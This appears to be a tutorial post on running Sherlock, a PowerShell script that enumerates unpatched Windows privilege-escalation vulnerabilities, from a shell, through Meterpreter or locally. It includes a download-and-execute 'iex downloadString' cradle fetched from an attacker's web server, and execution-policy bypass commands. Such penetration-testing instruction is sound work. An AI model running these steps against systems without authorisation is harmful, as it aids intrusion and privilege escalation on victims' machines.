Sherlock is a Powershell script used to privilege escalation, quickly finding vulnerabilities in the system. (

Currently looks for:

  • MS10-015 : User Mode to Ring (KiTrap0D)
  • MS10-092 : Task Scheduler
  • MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
  • MS13-081 : TrackPopupMenuEx Win32k NULL Page
  • MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
  • MS15-051 : ClientCopyImage Win32k
  • MS15-078 : Font Driver Buffer Overflow
  • MS16-016 : ‘mrxdav.sys’ WebDAV
  • MS16-032 : Secondary Logon Handle
  • MS16-034 : Windows Kernel-Mode Drivers EoP
  • MS16-135 : Win32k Elevation of Privilege
  • CVE-2017-7199 : Nessus Agent 6.6.2 – 6.10.3 Priv Esc

Running the program (Remote)

1. Download the tool from github, and start a python web server

  • git clone
  • cd Sherlock
  • python3.9 -m http.server 8888

2. From the remote server, having already a shell session, we need to download and run the script using Powershell. Even though Powershell has the ExecutionPolicy set to restricted we can run a remote script.

  • cd %temp%
  • powershell -command “get-executionpolicy”
  • powershell “iex(new-object net.webclient).downloadString(‘’);Find-AllVulns”

Running the program (Meterpreter)

1. Having a Meterpreter session we can run powershell.

  • load powershell

2. Import the Sherlock script. Locate the folder containing it

  • powershell_import ‘Sherlock.ps1’

3. Run the script

  • powershell_execute “Find-allvulns”

Note. The execution policy needs to be a flexible one like bypass or undefined instead of restrict.

  • Set-ExecutionPolicy -ExecutionPolicy bypass -Scope CurrentUser

Running the program from Powershell

1. Set execution policy to bypass

  • Set-ExecutionPolicy -ExecutionPolicy bypass -Scope CurrentUser

2. Import the module

  • Import-module -Name C:\Users\Vry4n\Downloads\Sherlock.ps1

3. Run the module

  • Find-AllVulns

Note. If we try to import the script when the execution policy blocks the script, we may get this message “SecurityError: (:) [Import-Module], PSSecurityException”